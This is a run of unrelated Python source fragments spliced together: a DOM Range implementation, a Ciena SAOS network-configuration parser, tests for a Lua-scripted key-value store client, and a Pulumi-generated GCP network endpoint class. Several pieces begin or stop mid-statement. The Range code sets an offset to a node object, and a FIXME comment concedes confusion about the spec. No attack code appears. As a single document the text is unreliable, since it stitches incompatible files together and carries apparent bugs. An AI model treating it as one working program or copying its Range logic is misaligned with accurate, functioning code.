self.startContainer.deleteData(self.startOffset,1+self.endOffset-self.startOffset)
else:
#Delete a set number of children
numDel = self.endOffset - self.startOffset+1
for ctr in range(numDel):
c = self.startContainer.removeChild(self.startContainer.childNodes[self.startOffset])
ReleaseNode(c)
self.__dict__['endContainer'] = self.startContainer
self.__dict__['endOffset'] = self.endContainer
self.__dict__['commonAncestorContainer'] = self.endContainer
self.__dict__['collapsed'] = 1
elif self.startContainer == self.commonAncestorContainer:
#Delete up the endContainer
#From the start to the end
if self.endContainer.nodeType in [Node.TEXT_NODE,
Node.COMMENT_NODE,
Node.PROCESSING_INSTRUCTION_NODE]:
#Adjust the character data
self.endContainer.deleteData(0,self.endOffset)
else:
numDel = self.endOffset
for ctr in range(numDel):
c = self.endContainer.removeChild(self.endContainer.childNodes[0])
ReleaseNode(c)
cur = self.endContainer
while cur.parentNode != self.commonAncestorContainer:
while cur.previousSibling:
c = cur.parentNode.removeChild(cur.previousSibling)
ReleaseNode(c)
cur = cur.parentNode
#Delete up to the ancestor of end
endAncestorChild = cur
while self.startContainer.firstChild != endAncestorChild:
c = self.startContainer.removeChild(self.startContainer.firstChild)
ReleaseNode(c)
elif self.endContainer == self.commonAncestorContainer:
if self.startContainer.nodeType in [Node.TEXT_NODE,
Node.COMMENT_NODE,
Node.PROCESSING_INSTRUCTION_NODE]:
#Adjust the character data
self.startContainer.deleteData(self.startOffset,1+len(self.startContainer.data)-self.startOffset)
else:
numDel = len(self.startContainer.childNodes) - self.startOffset
for ctr in range(numDel):
c = self.startContainer.removeChild(self.startContainer.childNodes[self.startOffset])
ReleaseNode(c)
cur = self.startContainer
while cur.parentNode != self.commonAncestorContainer:
while cur.nextSibling:
c = cur.parentNode.removeChild(cur.nextSibling)
ReleaseNode(c)
cur = cur.parentNode
startAncestorChild = cur
#Delete up to the ancestor of start
startAncestorChild = cur
startIndex = self.endContainer.childNodes.index(cur)
numDel = self.endOffset - startIndex
for ctr in range(numDel):
c = self.endContainer.removeChild(startAncestorChild.nextSibling)
ReleaseNode(c)
else:
#From the start to the end
if self.startContainer.nodeType in [Node.TEXT_NODE,
Node.COMMENT_NODE,
Node.PROCESSING_INSTRUCTION_NODE]:
#Adjust the character data
self.startContainer.deleteData(self.startOffset,1+len(self.startContainer.data)-self.startOffset)
else:
numDel = len(self.startContainer.childNodes) - self.startOffset
for ctr in range(numDel):
c = self.startContainer.removeChild(self.startContainer.childNodes[self.startOffset])
ReleaseNode(c)
cur = self.startContainer
while cur.parentNode != self.commonAncestorContainer:
while cur.nextSibling:
c = cur.parentNode.removeChild(cur.nextSibling)
ReleaseNode(c)
cur = cur.parentNode
startAncestorChild = cur
#Delete up the endContainer
#From the start to the end
if self.endContainer.nodeType in [Node.TEXT_NODE,
Node.COMMENT_NODE,
Node.PROCESSING_INSTRUCTION_NODE]:
#Adjust the character data
self.endContainer.deleteData(0,self.endOffset)
else:
numDel = self.endOffset
for ctr in range(numDel):
c = self.endContainer.removeChild(self.endContainer.childNodes[0])
ReleaseNode(c)
cur = self.endContainer
while cur.parentNode != self.commonAncestorContainer:
while cur.previousSibling:
c = cur.parentNode.removeChild(cur.previousSibling)
ReleaseNode(c)
cur = cur.parentNode
endAncestorChild = cur
cur = startAncestorChild
#Delete everything between us
while cur.nextSibling != endAncestorChild:
c = cur.parentNode.removeChild(cur.nextSibling)
ReleaseNode(c)
#Adjust the containers
#FIXME What the heck is the spec talking about??
self.__dict__['endContainer'] = self.startContainer
self.__dict__['endOffset'] = self.startContainer
self.__dict__['commonAncestorContainer'] = self.startContainer
self.__dict__['collapsed'] = 1
return None
def detach(self):
self.detached = 1
del self.startContainer
del self.endContainer
del self.startOffset
del self.endOffset
del self.collapsed
del self.commonAncestorContainer
def extractContents(self):
"""Extract the contents defined by this range"""
if self.detached:
raise InvalidStateErr()
df = self._ownerDocument.createDocumentFragment()
if self.startContainer == self.endContainer:
if self.startOffset == self.endOffset:
return df
if self.startContainer.nodeType in [Node.TEXT_NODE,
Node.COMMENT_NODE,
Node.PROCESSING_INSTRUCTION_NODE]:
#Adjust the character data
data = self.startContainer.substringData(self.startOffset,1+self.endOffset-self.startOffset)
self.startContainer.deleteData(self.startOffset,1+self.endOffset-self.startOffset)
tx = self._ownerDocument.createTextNode(data)
df.appendChild(tx)
else:
#Extrace a set number of children
numDel = self.endOffset - self.startOffset+1
for ctr in range(numDel):
c = self.startContainer.removeChild(self.startContainer.childNodes[self.startOffset])
df.appendChild(c)
elif self.startContainer == self.commonAncestorContainer:
#Delete up the endContainer
#From the start to the end
lastKids = []
copyData = None
#Delete up the endContainer
#From the start to the end
if self.endContainer.nodeType | |
<reponame>mwallraf/network-config-parser
import re
from nmsnetlib.parsers.definitions.CienaSAOS import definition as SAOSdefinition
from nmsnetlib.parsers.definitions.CienaERS import definition as ERSdefinition
from nmsnetlib.parsers.definitions.CiscoIOS import definition as CiscoIOSdefinition
from nmsnetlib.models.carrierethernet import SAOSModel, ERSModel
from nmsnetlib.models.cpe import CiscoIOSModel
from nmsnetlib.parsers.blockparser import BlockParser, LineParser
#### import logging
#### logger = logging.getLogger(__name__)
#### #logger.setLevel(logging.DEBUG)
#### logger.setLevel(logging.CRITICAL)
#### screenformatter = logging.Formatter('%(asctime)s - %(name)s [%(lineno)d] - %(levelname)s - %(message)s')
#### logprinter = logging.StreamHandler()
#### logprinter.setFormatter(screenformatter)
#### logger.addHandler(logprinter)
UNKNOWN = '-unknown-'
NONE = '-none-'
class SAOSParser(BlockParser):
def __init__(self, hostname=None, configfile="", keepemptyblocks=False, debug=False):
super(SAOSParser, self).__init__(hostname, configfile, keepemptyblocks, model=SAOSModel(), debug=debug)
#self.parser = "SAOSParser"
# configuration file details
#self.reConfigStart = re.compile("^! (?P<HWTYPE>[0-9]+) Configuration File") ## how to recognize the start of a config file
self.reConfigStart = re.compile("^! ### START OF CONFIG ###")
self.reBlockStart = re.compile("^!{10,}$") ## how to recognize the start of a new block
self.reBlockName = re.compile("^! (?P<BLOCKNAME>[A-Z].*)$")
self.reBlockEnd = re.compile("^$") ## a new block will be created at each reBlockStart, for the last block in the file we will detect an empty line otherwise it will not be processed
#self.reBlockEnd = re.compile("^!$") ## how to recognize the end of a new block
#self.BlockEndRepeat = 2 ## a block starts and ends with a single line with "!"
self.reIgnoreLine = re.compile("^(!+)$")
self.parseSingleLine = True ## if enabled then also parse lines outside blocks
self.pdef = SAOSdefinition
def _is_class(self, o):
"""
Checks if a variable is a Class object (Class)
Returns True if it is
False if it's not
"""
return True if hasattr(o, '__dict__') else False
def _link_references(self):
"""
Link strings to objects if possible.
This function is called as last while parsing the config.
"""
super(SAOSParser, self)._link_references()
## links inside subports (for 87xx)
## - add parentport to the vlan ports
## - link to parentport
for sp in self.model.subports:
# add parentport to the vlan ports
for v in sp.vtags:
vlan = next(iter(list(filter(lambda x: str(v) == str(x.vlan), self.model.vlans))), None)
if vlan is not None:
vlan.ports.append(sp.parentport)
# link to parentport
pp = next(iter(list(filter(lambda x: str(sp.parentport) == str(x.name), self.model.switchports))), None)
if pp is not None:
sp.parentport = pp
## links inside virtual-switches
## - virtual-interfaces (mainly for 87xx)
## - vlans inside a VS are C-VLANS
## - link the port (TODO: should this be a list ?)
## - link the virtual-circuit
for vswitch in self.model.vswitches:
# virtual-interfaces
new_vi = []
for vint in vswitch.virtualinterfaces:
vi = next(iter(list(filter(lambda x: str(x.name) == str(vint), self.model.virtual_interfaces() ))), None)
if vi is not None:
new_vi.append(vi)
else:
new_vi.append(vint)
vswitch.virtualinterfaces = new_vi
# set vlan type to CVLAN
#
## TODO: CVLANS NORMALLY DON'T EXIST, ADD THEM HERE AS A CVLAN
vlan = next(iter(list(filter(lambda x: str(x.vlan) == str(vswitch.vlan), self.model.vlans))), None)
if vlan is not None:
#print("vlan found '{}', {}".format(vswitch.vlan, vlan))
vlan.type.append("CVLAN")
vlan.type = list(set(vlan.type))
vswitch.vlan = vlan
vlan._vswitches.append(vswitch)
else:
## TODO, create the vlan
pass
# link the port
port = next(iter(list(filter(lambda x: str(x.name) == str(vswitch.port), self.model.switchports))), None)
if port is not None:
#print("vlan found '{}', {}".format(vswitch.vlan, vlan))
vswitch.port = port
# link the virtual-cicruit
vcircuit = next(iter(list(filter(lambda x: str(x.name) == str(vswitch.vcircuit), self.model.vcircuits))), None)
if vcircuit is not None:
#print("vlan found '{}', {}".format(vswitch.vlan, vlan))
vswitch.vcircuit = vcircuit
## links inside virtual-circuits
## - vlans type = s-vlan
for vcircuit in self.model.vcircuits:
# set vlan type to SVLAN
vlan = next(iter(list(filter(lambda x: str(x.vlan) == str(vcircuit.vlan), self.model.vlans))), None)
if vlan is not None:
#print("vlan found '{}', {}".format(vswitch.vlan, vlan))
vlan.type.append("SVLAN")
vlan.type = list(set(vlan.type))
vcircuit.vlan = vlan
## links inside vlans
## - link ports
## - _vlans inside ports
for vlan in self.model.vlans:
# link the port
new_ports = []
for port in vlan.ports:
p = next(iter(list(filter(lambda x: str(x.name) == str(port), self.model.switchports))), None)
if p is not None:
new_ports.append(p)
# link the vlan in a switchport
p._vlans.append(vlan)
else:
new_ports.append(port)
vlan.ports = new_ports
## link the services to the vswitch
for svc in self.model.services:
vswitch = next(iter(list(filter(lambda x: str(x.name) == str(svc), self.model.vswitches))), None)
if vswitch is not None:
svc.vswitch = vswitch
# link virtualinterfaces inside vswitch
# for vswitch in self.model.vswitches:
# new_vi = []
# for vint in vswitch.virtualinterfaces:
# vi = next(iter(list(filter(lambda x: str(x.name) == str(vint), self.model.virtual_interfaces() ))), None)
# if vi:
# new_vi.append(vi)
# else:
# new_vi.append(vint)
# vswitch.virtualinterfaces = new_vi
## links inside virtual-rings
## - link vswitches
## - add vlans based on subports (for 87xx)
## - vlans are of type SVLAN
## - link to logical-ring
## - set rpl-owner
for vring in self.model.virtual_rings():
# link the vswitches (TODO: is this correct for 87xx ??)
new_vswitches = []
for vswitch in vring.vswitches:
vs = next(iter(list(filter(lambda x: str(x.name) == str(vswitch), self.model.vswitches))), None)
if vs is not None:
#print("VIRTUAL SWITCH FOUND: {}".format(vs))
new_vswitches.append(vs)
else:
new_vswitches.append(vswitch)
vring.vswitches = new_vswitches
# add S-vlans based on subports (for 87xx)
# vswitch > virtualinterfaces > subports > vtag
for vswitch in (vring.vswitches) :
#vswitchobj = next(iter(list(filter(lambda x: str(x.name) == vswitch, self.model.vswitches))), None)
if self._is_class(vswitch):
for vint in (vswitch.virtualinterfaces or []):
#print("subports: {}".format(self.model.subports))
subportobj = next(iter(list(filter(lambda x: str(x.name) == str(vint), self.model.subports))), None)
if not subportobj:
print("{} - {} - subport {} is not found".format(self.model.host.hostname, vring, vint))
else:
for vtag in (subportobj.vtags or []):
#print("{} - {} - {} - {} s-vlan found".format(self.model.host.hostname, vring, vint, vtag))
vring.vlans.append(vtag)
# set vlan type to SVLAN
new_vlans = []
for vlan in vring.vlans:
v = next(iter(list(filter(lambda x: str(x.vlan) == str(vlan), self.model.vlans))), None)
if v is not None:
#print("VIRTUAL SWITCH FOUND: {}".format(vs))
v.type.append("SVLAN")
v.type = list(set(v.type))
v._virtualrings.append(vring)
new_vlans.append(v)
else:
#vlan._virtualrings.append(vring)
new_vlans.append(vlan)
vring.vlans = new_vlans
# link to the logical ring
lr = next(iter(list(filter(lambda x: x.type == 'logical-ring' and str(x.name) == str(vring.logicalring), self.model.rings))), None)
if lr is not None:
vring.logicalring = lr
# set rplowner
if len(vring.rplownerport) > 0:
vring.rplowner.append(self.model.host.hostname)
# set east-port-termination + west-port-termination
if vring.subring == "east-port-termination":
vring._eastport_termination.append(self.model.host.hostname)
elif vring.subring == "west-port-termination":
vring._westport_termination.append(self.model.host.hostname)
## the only exception is the VR-CMR_xxxx or VR-CMR-BRU-LAB_xxxx rings, this one does not have any termination port
#if vring.name == 'VR-CMR_3801':
if re.match("^VR-CMR(?:\-...\-LAB|\-LAB)?_", vring.name):
vring._eastport_termination.append(NONE)
vring._westport_termination.append(NONE)
# make unique lists
vring.vlans = list(set(vring.vlans))
# ADD vlans to virtual-rings based on vtags in subports for SAOS87
# vswitch > virtualinterfaces > subports > vtag
# for vring in self.model.virtual_rings():
# #print("vring -> {}".format(vring))
# for vswitch in (vring.vswitches) :
# vswitchobj = next(iter(list(filter(lambda x: str(x.name) == vswitch, self.model.vswitches))), None)
# for vint in (vswitchobj.virtualinterfaces or []):
# #print("subports: {}".format(self.model.subports))
# subportobj = next(iter(list(filter(lambda x: str(x.name) == str(vint), self.model.subports))), None)
# if not subportobj:
# print("{} - {} - subport {} is not found".format(self.model.host.hostname, vring, vint))
# else:
# for vtag in (subportobj.vtags or []):
# #print("{} - {} - {} - {} s-vlan found".format(self.model.host.hostname, vring, vint, vtag))
# vring.vlans.append(vtag)
# vring.vlans = list(set(vring.vlans))
# vlan in vswitches, type = c-vlan
# for vswitch in self.model.vswitches:
# vlan = next(iter(list(filter(lambda x: str(x.vlan) == str(vswitch.vlan), self.model.vlans))), None)
# if vlan:
# #print("vlan found '{}', {}".format(vswitch.vlan, vlan))
# vswitch.vlan = vlan
# vlan.type.append("CVLAN")
# vlan.type = list(set(vlan.type))
# ports in vswitches
# for vswitch in self.model.vswitches:
# port = next(iter(list(filter(lambda x: str(x.name) == str(vswitch.port), self.model.switchports))), None)
# if port:
# #print("vlan found '{}', {}".format(vswitch.vlan, vlan))
# vswitch.port = port
# ports in vlans
# for vlan in self.model.vlans:
# new_ports = []
# for port in vlan.ports:
# p = next(iter(list(filter(lambda x: str(x.name) == str(port), self.model.switchports))), None)
# if p:
# new_ports.append(p)
# else:
# new_ports.append(port)
# vlan.ports = new_ports
# vcircuits in vswitches
# for vswitch in self.model.vswitches:
# vcircuit = next(iter(list(filter(lambda x: str(x.name) == str(vswitch.vcircuit), self.model.vcircuits))), None)
# if vcircuit:
# #print("vlan found '{}', {}".format(vswitch.vlan, vlan))
# vswitch.vcircuit = vcircuit
## links inside logical-rings
## - link east-port and west-port
## - link the virtual-ring
for lring in self.model.logical_rings():
# link east-port and west-port
eastport = next(iter(list(filter(lambda x: str(x.name) == str(lring.eastport), self.model.switchports))), None)
westport = next(iter(list(filter(lambda x: str(x.name) == str(lring.westport), self.model.switchports))), None)
if eastport is not None:
lring.eastport = eastport
if westport is not None:
lring.westport = westport
# link the virtual-ring
vr = next(iter(list(filter(lambda x: x.type == 'virtual-ring' and str(x.logicalring) == str(lring.name), | |
XT of k4 to be 0xffffffffff + 10, but really the max
# value is kt_none, so it retains that value when re-reading.
out = self.db.touch_bulk_relative(['k2', 'k4', 'kx'], 10)
self.assertEqual(out, {
'k2': xt2 + 10,
'k4': xt_none + 10})
self.assertXT(['k1', 'k2', 'k3', 'k4'], {
'k1': ('v1', xt1 + 300),
'k2': ('v2', xt2 + 10),
'k3': ('v3', ttl + 300),
'k4': ('v4', xt_none)})
self.assertEqual(self.db.expire_time('k1'), xt1 + 300)
self.assertEqual(self.db.expire_time('k2'), xt2 + 10)
self.assertEqual(self.db.expire_time('k4'), xt_none)
self.assertEqual(self.db.expire_time('kx'), None)
# Verify we can use touch_relative() and also set negative intervals.
out = self.db.touch_relative('k1', -100)
self.assertEqual(out, xt1 + 200)
self.assertEqual(self.db.expire_time('k1'), xt1 + 200)
class TestLuaErrorCode(BaseLuaTestCase):
def test_error_codes(self):
def trigger(flag):
return self.db.script('_error_code', {'flag': str(flag)})
self.assertEqual(trigger(0), {})
expected = (
(1, 'noimpl'),
(2, 'invalid'),
(3, 'logic'),
(4, 'internal'),
(5, 'norepos'),
(6, 'noperm'),
(7, 'broken'),
(8, 'duprec'),
(9, 'norec'),
(10, 'system'),
(11, 'misc'))
for flag, msg in expected:
with self.assertRaises(ProtocolError):
trigger(flag)
code, resp_msg = self.db.error()
self.assertEqual(msg, resp_msg)
# After a successful operation, we get the success code.
self.db.set('kx', 'vx')
code, resp_msg = self.db.error()
self.assertEqual(resp_msg, 'success')
# Even though this fails, the error is not set to duprec? Just
# documenting this weird behavior.
self.assertFalse(self.db.add('kx', 'vx2'))
code, resp_msg = self.db.error()
self.assertEqual(resp_msg, 'success')
class TestLua(BaseLuaTestCase):
def test_script_set(self):
L = self.db.lua
# Test adding a single item.
self.assertEqual(L.sadd(key='s1', x='foo'), {'num': '1'})
self.assertEqual(L.sadd(key='s1', x='foo'), {'num': '0'})
# Test adding multiple items.
items = ['bar', 'baz', 'nug']
ret = L.sadd(key='s1', **{str(i): k for i, k in enumerate(items)})
self.assertEqual(ret, {'num': '3'})
# Test get cardinality.
self.assertEqual(L.scard(key='s1'), {'num': '4'})
# Test membership.
self.assertEqual(L.sismember(key='s1', value='bar'), {'num': '1'})
self.assertEqual(L.sismember(key='s1', value='baze'), {'num': '0'})
keys = ['bar', 'baz', 'foo', 'nug']
# Test get members.
self.assertEqual(sorted(L.smembers(key='s1').values()), sorted(keys))
self.assertEqual(L.scard(key='s1'), {'num': '4'})
# Test pop.
res = L.spop(key='s1')
self.assertEqual(res['num'], '1')
self.assertTrue(res['value'] in keys)
self.assertEqual(L.scard(key='s1'), {'num': '3'})
# Pop remaining 3 items.
for _ in range(3):
res = L.spop(key='s1')
self.assertTrue(res['value'] in keys)
self.assertEqual(L.scard(key='s1'), {'num': '0'})
res = L.spop(key='s1')
self.assertEqual(res, {'num': '0'})
# Restore all keys.
L.sadd(key='s1', **{str(i): k for i, k in enumerate(keys)})
self.assertEqual(L.srem(key='s1', x='nug'), {'num': '1'})
self.assertEqual(L.srem(key='s1', x='nug'), {'num': '0'})
# Create another set, s2 {baze, foo, zai}.
L.sadd(key='s2', a='baze', b='foo', c='zai')
# Test multiple set operations, {bar, baz, foo} | {baze, foo, zai}.
res = L.sinter(key='s1', key2='s2').values()
self.assertEqual(sorted(res), ['foo'])
res = L.sunion(key='s1', key2='s2').values()
self.assertEqual(sorted(res), ['bar', 'baz', 'baze', 'foo', 'zai'])
res = L.sdiff(key='s1', key2='s2').values()
self.assertEqual(sorted(res), ['bar', 'baz'])
res = L.sdiff(key='s2', key2='s1').values()
self.assertEqual(sorted(res), ['baze', 'zai'])
res = L.sdiff(key='s1', key2='s2', dest='s3').values()
self.assertEqual(sorted(res), ['bar', 'baz'])
res = L.smembers(key='s3').values()
self.assertEqual(sorted(res), ['bar', 'baz'])
def test_script_list(self):
L = self.db.lua
self.assertEqual(L.lrpush(key='l1', value='i0'), {'length': '1'})
# Test appending items to list.
for i in range(1, 5):
L.lrpush(key='l1', value='i%s' % i)
# Test accessing items by index.
for i in range(5):
self.assertEqual(L.lindex(key='l1', index=i), {'value': 'i%s' % i})
# Invalid index returns empty result set.
self.assertEqual(L.lindex(key='l1', index=6), {})
self.assertEqual(L.lindex(key='l1', index=-1), {'value': 'i4'})
# Get length of list, pop last item, verify length change.
self.assertEqual(L.llen(key='l1'), {'num': '5'})
self.assertEqual(L.lrpop(key='l1'), {'value': 'i4'})
self.assertEqual(L.llen(key='l1'), {'num': '4'})
# Verify setting indices.
self.assertEqual(L.lset(key='l1', index=2, value='i2-x'), {'num': '1'})
self.assertEqual(L.lindex(key='l1', index=2), {'value': 'i2-x'})
self.assertEqual(L.lrpop(key='l1'), {'value': 'i3'})
self.assertEqual(L.llpop(key='l1'), {'value': 'i0'})
self.assertEqual(L.lrpop(key='l1'), {'value': 'i2-x'})
self.assertEqual(L.llpop(key='l1'), {'value': 'i1'})
self.assertEqual(L.llen(key='l1'), {'num': '0'})
self.assertEqual(L.llpop(key='l1'), {})
self.assertEqual(L.lrpop(key='l1'), {})
def test_list_insert(self):
# Test getting ranges.
L = self.db.lua
for i in range(5):
L.lrpush(key='l1', value='i%s' % i)
R = functools.partial(L.lrange, key='l1')
L.linsert(key='l1', index=1, value='i0.5')
self.assertEqual(R(start=0, stop=3), {'0': 'i0', '1': 'i0.5',
'2': 'i1'})
L.linsert(key='l1', index=-1, value='i3.5')
self.assertEqual(R(), {'0': 'i0', '1': 'i0.5', '2': 'i1', '3': 'i2',
'4': 'i3', '5': 'i3.5', '6': 'i4'})
def test_script_list_ranges(self):
# Test getting ranges.
L = self.db.lua
for i in range(5):
L.lrpush(key='l1', value='i%s' % i)
R = functools.partial(L.lrange, key='l1')
all_items = dict((str(i), 'i%s' % i) for i in range(5))
self.assertEqual(R(), all_items)
self.assertEqual(R(start=0), all_items)
self.assertEqual(R(start=-5), all_items)
self.assertEqual(R(stop=5), all_items)
# Within bounds.
self.assertEqual(R(start=1, stop=4), {'0': 'i1', '1': 'i2', '2': 'i3'})
self.assertEqual(R(start=0, stop=1), {'0': 'i0'})
self.assertEqual(R(start=3), {'0': 'i3', '1': 'i4'})
self.assertEqual(R(stop=-3), {'0': 'i0', '1': 'i1'})
self.assertEqual(R(start=1, stop=-3), {'0': 'i1'})
self.assertEqual(R(start=3, stop=-1), {'0': 'i3'})
self.assertEqual(R(start=-1), {'0': 'i4'})
self.assertEqual(R(start=-2), {'0': 'i3', '1': 'i4'})
# Out-of-bounds or out-of-order.
self.assertEqual(R(start=5), {})
self.assertEqual(R(start=-6), {})
self.assertEqual(R(start=0, stop=0), {})
self.assertEqual(R(start=-1, stop=3), {})
self.assertEqual(R(start=3, stop=2), {})
self.assertEqual(R(start=1, stop=1), {})
def test_script_hash(self):
L = self.db.lua
# Set multiple items, returns number set.
res = L.hmset(table_key='h1', k1='v1', k2='v2', k3='v3')
self.assertEqual(res['num'], '3')
# Set individual item using key=..., value=...
res = L.hset(table_key='h1', key='k1', value='v1-x')
self.assertEqual(res['num'], '1')
# Retrieve an individual item.
self.assertEqual(L.hget(table_key='h1', key='k1'), {'value': 'v1-x'})
# Missing key returns empty response.
self.assertEqual(L.hget(table_key='h1', key='kx'), {})
# Retrieve multiple items. Missing keys are omitted.
res = L.hmget(table_key='h1', k1='', k2='', kx='')
self.assertEqual(res, {'k1': 'v1-x', 'k2': 'v2'})
# Retrieve all key/values in hash.
res = L.hgetall(table_key='h1')
self.assertEqual(res, {'k1': 'v1-x', 'k2': 'v2', 'k3': 'v3'})
# Delete individual key, returns number deleted.
self.assertEqual(L.hdel(table_key='h1', key='k2'), {'num': '1'})
self.assertEqual(L.hdel(table_key='h1', key='k2'), {'num': '0'})
# Delete multiple keys, returns number deleted.
self.assertEqual(L.hmdel(table_key='h1', k1='', k3=''), {'num': '2'})
self.assertEqual(L.hgetall(table_key='h1'), {})
# We can conditionally set a key (if it does not exist). Returns 1 if
# successful.
res = L.hsetnx(table_key='h1', key='k1', value='v1-y')
self.assertEqual(res, {'num': '1'})
res = L.hsetnx(table_key='h1', key='k1', value='v1-z')
self.assertEqual(res, {'num': '0'})
# Set an additional key and verify hash contents for subsequent checks.
L.hsetnx(table_key='h1', key='k2', value='v2')
self.assertEqual(L.hgetall(table_key='h1'), {'k1': 'v1-y', 'k2': 'v2'})
self.assertEqual(L.hlen(table_key='h1'), {'num': '2'})
self.assertEqual(L.hcontains(table_key='h1', key='k1'), {'num': '1'})
self.assertEqual(L.hcontains(table_key='h1', key='kx'), {'num': '0'})
# Getting values from a non-existent hash returns empty response.
self.assertEqual(L.hgetall(table_key='h2'), {})
def test_script_list_items(self):
self.assertEqual(self.db.script('list'), {})
self.db.update(k1='v1', k2='v2', k3='v3')
self.assertEqual(self.db.script('list'),
{'k1': 'v1', 'k2': 'v2', 'k3': 'v3'})
def test_script_get_range(self):
self.assertEqual(self.db.script('get_range'), {})
data = {'k%s' % i: 'v%s' % i for i in range(11)}
self.db.set_bulk(data)
def assertRange(start, stop, expected):
params = {}
if start: params['start'] = start
if stop: params['stop'] = stop
self.assertEqual(self.db.script('get_range', params), expected)
assertRange('k8', None, {'k8': 'v8', 'k9': 'v9'})
assertRange('k80', None, {'k9': 'v9'})
assertRange(None, 'k2', {'k0': 'v0', 'k1': 'v1', 'k10': 'v10',
'k2': 'v2'})
assertRange(None, 'k2.2', self.db.script('get_range', {'stop': 'k2'}))
assertRange('k10', 'k3', {'k10': 'v10', 'k2': 'v2', 'k3': 'v3'})
assertRange('k101', 'k3', {'k2': 'v2', 'k3': 'v3'})
assertRange('k10', 'k31', {'k10': 'v10', 'k2': 'v2', 'k3': 'v3'})
assertRange('a', 'k1', {'k0': 'v0', 'k1': 'v1'})
assertRange('k9', 'z', {'k9': 'v9'})
assertRange('a', 'b', {})
assertRange('x', 'y', {})
assertRange('x', None, {})
assertRange(None, 'a', {})
def test_get_part(self):
V = '0123456789'
self.db.update(k1=V, k2='')
def assertPart(key, start, stop, expected):
params = {'key': key, 'start': start}
if stop is not None:
params['stop'] = stop
result = self.db.script('get_part', params)
if expected is None:
self.assertTrue('value' not in result)
else:
self.assertEqual(result['value'], expected)
assertPart('k1', 0, None, V)
assertPart('k1', 0, -1, V[0:-1])
assertPart('k1', 1, 3, V[1:3])
assertPart('k1', 1, 30, V[1:])
assertPart('k1', 20, 30, '')
assertPart('k1', -3, None, V[-3:])
assertPart('k1', -5, -1, V[-5:-1])
assertPart('k1', -20, -10, '')
assertPart('k1', -20, None, V[-20:])
assertPart('k2', 0, None, '')
assertPart('k2', 1, -1, '')
assertPart('k2', -1, None, '')
assertPart('k3', 0, None, None)
assertPart('k3', 1, -1, None)
def test_queue_methods(self):
L = self.db.lua
for i in range(5):
L.queue_add(queue='tq', data='item-%s' % i)
self.assertEqual(L.queue_size(queue='tq'), {'num': '5'})
# By default one item is dequeued.
result = L.queue_pop(queue='tq')
self.assertEqual(result, {'0': 'item-0'})
self.assertEqual(L.queue_size(queue='tq'), {'num': '4'})
# We can also peek at items.
self.assertEqual(L.queue_peek(queue='tq'), {'0': 'item-1'})
self.assertEqual(L.queue_peek(queue='tq', n=2),
{'0': 'item-1', '1': 'item-2'})
# We can dequeue multiple items.
result = L.queue_pop(queue='tq', n=3)
self.assertEqual(result, {'0': 'item-1', '1': 'item-2', '2': 'item-3'})
# Peek when fewer items exist:
self.assertEqual(L.queue_peek(queue='tq', n=3), {'0': 'item-4'})
# It's OK to pop if fewer items exist.
result = L.queue_pop(queue='tq', n=3)
self.assertEqual(result, {'0': 'item-4'})
# No items -> empty string and zero count.
self.assertEqual(L.queue_pop(queue='tq'), {})
self.assertEqual(L.queue_peek(queue='tq'), {})
self.assertEqual(L.queue_size(queue='tq'), {'num': '0'})
L.queue_add(queue='tq', data='item-y')
L.queue_add(queue='tq', data='item-z')
self.assertEqual(L.queue_clear(queue='tq'), {'num': '2'})
self.assertEqual(L.queue_clear(queue='tq'), {'num': '0'})
for i in range(6):
L.queue_add(queue='tq', data='item-%s' % i)
# Reverse-peek.
self.assertEqual(L.queue_rpeek(queue='tq'), {'0': 'item-5'})
self.assertEqual(L.queue_rpeek(queue='tq', n=2),
{'0': 'item-5', '1': 'item-4'})
# Reverse-pop.
result = L.queue_rpop(queue='tq', n=2)
self.assertEqual(result, {'0': 'item-5', '1': 'item-4'})
self.assertEqual(L.queue_pop(queue='tq'), {'0': 'item-0'})
self.assertEqual(L.queue_peek(queue='tq'), {'0': 'item-1'})
self.assertEqual(L.queue_rpop(queue='tq'), {'0': 'item-3'})
self.assertEqual(L.queue_rpeek(queue='tq'), {'0': 'item-2'})
# We can request more items than exist with rpeek.
self.assertEqual(L.queue_rpeek(queue='tq', n=4),
{'0': 'item-2', '1': 'item-1'})
# We can attempt to reverse-pop more items than exist:
result = L.queue_rpop(queue='tq', n=4)
self.assertEqual(result, {'0': 'item-2', '1': 'item-1'})
self.assertEqual(L.queue_rpop(queue='tq'), {})
self.assertEqual(L.queue_pop(queue='tq'), {})
# Test loop termination logic when we have no keys in the db.
self.db.clear()
self.assertEqual(L.queue_rpop(queue='tq'), {})
self.assertEqual(L.queue_pop(queue='tq'), {})
# Test bulk-add feature.
data = | |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['GlobalNetworkEndpointArgs', 'GlobalNetworkEndpoint']
@pulumi.input_type
class GlobalNetworkEndpointArgs:
def __init__(__self__, *,
global_network_endpoint_group: pulumi.Input[str],
port: pulumi.Input[int],
fqdn: Optional[pulumi.Input[str]] = None,
ip_address: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a GlobalNetworkEndpoint resource.
:param pulumi.Input[str] global_network_endpoint_group: The global network endpoint group this endpoint is part of.
:param pulumi.Input[int] port: Port number of the external endpoint.
:param pulumi.Input[str] fqdn: Fully qualified domain name of network endpoint.
This can only be specified when network_endpoint_type of the NEG is INTERNET_FQDN_PORT.
:param pulumi.Input[str] ip_address: IPv4 address external endpoint.
:param pulumi.Input[str] project: The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
"""
pulumi.set(__self__, "global_network_endpoint_group", global_network_endpoint_group)
pulumi.set(__self__, "port", port)
if fqdn is not None:
pulumi.set(__self__, "fqdn", fqdn)
if ip_address is not None:
pulumi.set(__self__, "ip_address", ip_address)
if project is not None:
pulumi.set(__self__, "project", project)
@property
@pulumi.getter(name="globalNetworkEndpointGroup")
def global_network_endpoint_group(self) -> pulumi.Input[str]:
"""
The global network endpoint group this endpoint is part of.
"""
return pulumi.get(self, "global_network_endpoint_group")
@global_network_endpoint_group.setter
def global_network_endpoint_group(self, value: pulumi.Input[str]):
pulumi.set(self, "global_network_endpoint_group", value)
@property
@pulumi.getter
def port(self) -> pulumi.Input[int]:
"""
Port number of the external endpoint.
"""
return pulumi.get(self, "port")
@port.setter
def port(self, value: pulumi.Input[int]):
pulumi.set(self, "port", value)
@property
@pulumi.getter
def fqdn(self) -> Optional[pulumi.Input[str]]:
"""
Fully qualified domain name of network endpoint.
